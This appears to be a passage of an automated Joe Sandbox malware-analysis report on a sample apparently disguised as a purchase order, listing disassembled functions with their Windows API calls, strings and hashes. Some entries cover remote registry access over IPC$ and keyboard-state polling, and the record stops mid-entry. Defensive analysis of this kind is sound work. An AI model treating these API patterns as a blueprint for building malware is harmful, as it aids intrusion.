                          Function 00F6E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F6EA5D
                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F6EA73
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6EA84
                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F6EA96
                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F6EAA7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: SendString$_wcslen
                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                          • API String ID: 2420728520-1007645807
                          • Opcode ID: c397f9cf47b97520c81e793351ae27aa57bdefbba6d207914729c63b54ec5c39
                          • Instruction ID: 6e440a90dbb8d0dd71edf1dbba51295303b70af9171ea1c625213ca138418f69
                          • Opcode Fuzzy Hash: c397f9cf47b97520c81e793351ae27aa57bdefbba6d207914729c63b54ec5c39
                          • Instruction Fuzzy Hash: FD11A335A5421A79D720A7A5DE4BEFF7B7CEFD1B10F4004297401E20D1EEB49905E5B1
                          Function 00F65CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,00000001), ref: 00F65CE2
                          • GetWindowRect.USER32(00000000,?), ref: 00F65CFB
                          • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00F65D59
                          • GetDlgItem.USER32(?,00000002), ref: 00F65D69
                          • GetWindowRect.USER32(00000000,?), ref: 00F65D7B
                          • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00F65DCF
                          • GetDlgItem.USER32(?,000003E9), ref: 00F65DDD
                          • GetWindowRect.USER32(00000000,?), ref: 00F65DEF
                          • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00F65E31
                          • GetDlgItem.USER32(?,000003EA), ref: 00F65E44
                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F65E5A
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00F65E67
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$ItemMoveRect$Invalidate
                          • String ID:
                          • API String ID: 3096461208-0
                          • Opcode ID: 20a6d6055f014675bb063f0a2e1e8d8b8734ccc2d00b1e7c7caba06eebd1a61c
                          • Instruction ID: 9a5a51af6a59beae0393b1b4b202f10eee387a102067b5b7d37bfc49983a5104
                          • Opcode Fuzzy Hash: 20a6d6055f014675bb063f0a2e1e8d8b8734ccc2d00b1e7c7caba06eebd1a61c
                          • Instruction Fuzzy Hash: A8510D71E00609AFDF18CFA8DD89AAEBBB5EB48710F548129F519E7290D7709E04DB60
                          Function 00F18BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F18F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F18BE8,?,00000000,?,?,?,?,00F18BBA,00000000,?), ref: 00F18FC5
                          • DestroyWindow.USER32(?), ref: 00F18C81
                          • KillTimer.USER32(00000000,?,?,?,?,00F18BBA,00000000,?), ref: 00F18D1B
                          • DestroyAcceleratorTable.USER32(00000000), ref: 00F56973
                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00F18BBA,00000000,?), ref: 00F569A1
                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00F18BBA,00000000,?), ref: 00F569B8
                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F18BBA,00000000), ref: 00F569D4
                          • DeleteObject.GDI32(00000000), ref: 00F569E6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                          • String ID:
                          • API String ID: 641708696-0
                          • Opcode ID: 3d83f2ee960a7ccd53f13babf3c2856b3ba0db75dd0281ff83a17378c40b2d51
                          • Instruction ID: f1ad5c81115dadd41cedcb1e77215bc67221bf3328dfdba92c79ae7c74720c82
                          • Opcode Fuzzy Hash: 3d83f2ee960a7ccd53f13babf3c2856b3ba0db75dd0281ff83a17378c40b2d51
                          • Instruction Fuzzy Hash: BD61DD32902708EFDB258F24DA58BA577F2FB403A2F50451AE14297960CB35ACC6FF91
                          Function 00F19838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F19944: GetWindowLongW.USER32(?,000000EB), ref: 00F19952
                          • GetSysColor.USER32(0000000F), ref: 00F19862
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ColorLongWindow
                          • String ID:
                          • API String ID: 259745315-0
                          • Opcode ID: fcc481da219809e18e19ab264fbb6a30566a0f53ba57a60db67f72e3e883d160
                          • Instruction ID: 503143f749cb6e11e77ec6f7538ff87c48ebe9dede03f637c9f494ef6a63169d
                          • Opcode Fuzzy Hash: fcc481da219809e18e19ab264fbb6a30566a0f53ba57a60db67f72e3e883d160
                          • Instruction Fuzzy Hash: 1441D331508644AFDB205F389C94BF93BA5BB46731F984606FAA2871E1D7719C81FB90
                          Function 00F696E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00F4F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00F69717
                          • LoadStringW.USER32(00000000,?,00F4F7F8,00000001), ref: 00F69720
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00F4F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00F69742
                          • LoadStringW.USER32(00000000,?,00F4F7F8,00000001), ref: 00F69745
                          • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00F69866
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString$Message_wcslen
                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                          • API String ID: 747408836-2268648507
                          • Opcode ID: 839f91b81e936b3955618346c2e78a5d39c589f937500260565ae7f176dee114
                          • Instruction ID: 843b47bd77da6df93247f5c471a9fa660a75f82e11d1baedfe1ab66516a6b682
                          • Opcode Fuzzy Hash: 839f91b81e936b3955618346c2e78a5d39c589f937500260565ae7f176dee114
                          • Instruction Fuzzy Hash: A4414072804219AADF04EBE0CE87EEE777CEF54340F504125B605B2092EA796F48FB61
                          Function 00F606DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F607A2
                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F607BE
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F607DA
                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F60804
                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00F6082C
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F60837
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F6083C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                          • API String ID: 323675364-22481851
                          • Opcode ID: b2e460f3d7d7100aae2767287815ab675cbff58ff78bb5fbdfba75d024741736
                          • Instruction ID: a81e9a5edbc2a85f4a3a2bf7f746dd2565d292672c1f25ce5ec27e8876686f9d
                          • Opcode Fuzzy Hash: b2e460f3d7d7100aae2767287815ab675cbff58ff78bb5fbdfba75d024741736
                          • Instruction Fuzzy Hash: FD411872C10229ABCF15EBA4DC85DEEB778FF44750F544169E901A31A1EB34AE44EBA0
                          Function 00F83C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00F83C5C
                          • CoInitialize.OLE32(00000000), ref: 00F83C8A
                          • CoUninitialize.OLE32 ref: 00F83C94
                          • _wcslen.LIBCMT ref: 00F83D2D
                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00F83DB1
                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F83ED5
                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00F83F0E
                          • CoGetObject.OLE32(?,00000000,00F9FB98,?), ref: 00F83F2D
                          • SetErrorMode.KERNEL32(00000000), ref: 00F83F40
                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F83FC4
                          • VariantClear.OLEAUT32(?), ref: 00F83FD8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                          • String ID:
                          • API String ID: 429561992-0
                          • Opcode ID: 3b0717fc8cbadb47fa80e020fc8e6b10300570c9872572873984f700c9462301
                          • Instruction ID: 76cc72fccde8d0dedcdd43a9c14ec1c54c3dcb54362f4632f7c0f5f80796be6b
                          • Opcode Fuzzy Hash: 3b0717fc8cbadb47fa80e020fc8e6b10300570c9872572873984f700c9462301
                          • Instruction Fuzzy Hash: D1C159716083059FD700EF68C88496BB7E9FF89B54F10491DF9899B261DB30ED05DB92
                          Function 00F77A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                          Download Yara Rule
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 00F77AF3
                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F77B8F
                          • SHGetDesktopFolder.SHELL32(?), ref: 00F77BA3
                          • CoCreateInstance.OLE32(00F9FD08,00000000,00000001,00FC6E6C,?), ref: 00F77BEF
                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F77C74
                          • CoTaskMemFree.OLE32(?,?), ref: 00F77CCC
                          • SHBrowseForFolderW.SHELL32(?), ref: 00F77D57
                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F77D7A
                          • CoTaskMemFree.OLE32(00000000), ref: 00F77D81
                          • CoTaskMemFree.OLE32(00000000), ref: 00F77DD6
                          • CoUninitialize.OLE32 ref: 00F77DDC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                          • String ID:
                          • API String ID: 2762341140-0
                          • Opcode ID: 964c67b1d4b65593974b3e458433eb8a8a1fdc25b75a42a5915d217122514234
                          • Instruction ID: ea46642bd017d4fb149fbd719983c8800a2112a57963310e557f314f492ea2f2
                          • Opcode Fuzzy Hash: 964c67b1d4b65593974b3e458433eb8a8a1fdc25b75a42a5915d217122514234
                          • Instruction Fuzzy Hash: 74C13A75A04209AFCB14DFA4C884DAEBBF9FF48314B148499E81ADB361D730EE45DB91
                          Function 00F9541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F95504
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F95515
                          • CharNextW.USER32(00000158), ref: 00F95544
                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F95585
                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F9559B
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F955AC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$CharNext
                          • String ID:
                          • API String ID: 1350042424-0
                          • Opcode ID: 2aa02a58f20f9e2a60161e73a51fda29df9638a65f28645d66d9caf15352b5f0
                          • Instruction ID: 953b0aa69da330b33279d253b5a83e6e7a78816b7a80ddff963a30ff4414c04c
                          • Opcode Fuzzy Hash: 2aa02a58f20f9e2a60161e73a51fda29df9638a65f28645d66d9caf15352b5f0
                          • Instruction Fuzzy Hash: DB61A031900608AFFF12DF54CC94AFE7BB9EB05B34F144145FA25AA291D7749A80FB61
                          Function 00F5FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                          Download Yara Rule
                          APIs
                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F5FAAF
                          • SafeArrayAllocData.OLEAUT32(?), ref: 00F5FB08
                          • VariantInit.OLEAUT32(?), ref: 00F5FB1A
                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F5FB3A
                          • VariantCopy.OLEAUT32(?,?), ref: 00F5FB8D
                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F5FBA1
                          • VariantClear.OLEAUT32(?), ref: 00F5FBB6
                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00F5FBC3
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F5FBCC
                          • VariantClear.OLEAUT32(?), ref: 00F5FBDE
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F5FBE9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                          • String ID:
                          • API String ID: 2706829360-0
                          • Opcode ID: 0f1d542ecc88648aeee3fa79922ae8bb7e9f65b95638f5cb5ffe205108ae1add
                          • Instruction ID: c08083df8a640b7928716ba5e673a958f058874935857315567e4037e32c0556
                          • Opcode Fuzzy Hash: 0f1d542ecc88648aeee3fa79922ae8bb7e9f65b95638f5cb5ffe205108ae1add
                          • Instruction Fuzzy Hash: 4D416235A0021AEFCF04DF68CC549ADBBB9FF48355F008065E946A7261CB34A949EFE1
                          Function 00F69C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00F69CA1
                          • GetAsyncKeyState.USER32(000000A0), ref: 00F69D22
                          • GetKeyState.USER32(000000A0), ref: 00F69D3D
                          • GetAsyncKeyState.USER32(000000A1), ref: 00F69D57
                          • GetKeyState.USER32(000000A1), ref: 00F69D6C
                          • GetAsyncKeyState.USER32(00000011), ref: 00F69D84
                          • GetKeyState.USER32(00000011), ref: 00F69D96
                          • GetAsyncKeyState.USER32(00000012), ref: 00F69DAE
                          • GetKeyState.USER32(00000012), ref: 00F69DC0
                          • GetAsyncKeyState.USER32(0000005B), ref: 00F69DD8
                          • GetKeyState.USER32(0000005B), ref: 00F69DEA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 2f8ef34f63edb187ba27c551240345eede09ffa1c4083ae3196f408eedf3f7d2
                          • Instruction ID: 1d198553093773c82875200f16ddc8a90cf79feac1ac4b9d00e7c19c703502d5
                          • Opcode Fuzzy Hash: 2f8ef34f63edb187ba27c551240345eede09ffa1c4083ae3196f408eedf3f7d2
                          • Instruction Fuzzy Hash: 3B41D934D0C7CA69FF308761C4043B5BEA8EF11364F08806ADAC6565C2DBF599C8E7A2
                          Function 00F8055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                          Download Yara Rule
                          APIs
                          • WSAStartup.WSOCK32(00000101,?), ref: 00F805BC
                          • inet_addr.WSOCK32(?), ref: 00F8061C
                          • gethostbyname.WSOCK32(?), ref: 00F80628
                          • IcmpCreateFile.IPHLPAPI ref: 00F80636
                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F806C6
                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F806E5
                          • IcmpCloseHandle.IPHLPAPI(?), ref: 00F807B9
                          • WSACleanup.WSOCK32 ref: 00F807BF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                          • String ID: Ping
                          • API String ID: 1028309954-2246546115
                          • Opcode ID: ae8a8215e1ec8d726abd9797a37ac62f83b8d79114094d99e66593cbd1584753
                          • Instruction ID: c986d05509ea86f540ebf5a107a2afe6a8ad2e0cc6d6a10a2e8ca8c0fc8d60c4
                          • Opcode Fuzzy Hash: ae8a8215e1ec8d726abd9797a37ac62f83b8d79114094d99e66593cbd1584753
                          • Instruction Fuzzy Hash: B591B335A082019FD760DF15C889F5ABBE0AF44328F5485A9F4658B7A2CB34FC49EF91
                          Function 00F88CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$BuffCharLower
                          • String ID: cdecl$none$stdcall$winapi
                          • API String ID: 707087890-567219261
                          • Opcode ID: 10b31eb1e1ab62f79b41f02a3ed5948e02f2efec87422be1441f309eaa38c0c1
                          • Instruction ID: 28437af7607588ebe9cf3d380c8ee2f9fa3f10156349b8c84d743bd47ec23914
                          • Opcode Fuzzy Hash: 10b31eb1e1ab62f79b41f02a3ed5948e02f2efec87422be1441f309eaa38c0c1
                          • Instruction Fuzzy Hash: CB51C632E041169BCB14EFACCD419FEB7A5BF64360BA04229E426E72C5DB74DD42E790
                          Function 00F8372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                          Download Yara Rule
                          APIs
                          • CoInitialize.OLE32 ref: 00F83774
                          • CoUninitialize.OLE32 ref: 00F8377F
                          • CoCreateInstance.OLE32(?,00000000,00000017,00F9FB78,?), ref: 00F837D9
                          • IIDFromString.OLE32(?,?), ref: 00F8384C
                          • VariantInit.OLEAUT32(?), ref: 00F838E4
                          • VariantClear.OLEAUT32(?), ref: 00F83936
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                          • API String ID: 636576611-1287834457
                          • Opcode ID: f712d76481347c355db7ddf14b7b70841d56453b22135c7649f4d9ce3c9d26c3
                          • Instruction ID: 068cca6a7d04c25939ac2c01097c579e29c0abf40c42abb7aa9cd4df702fcd0d
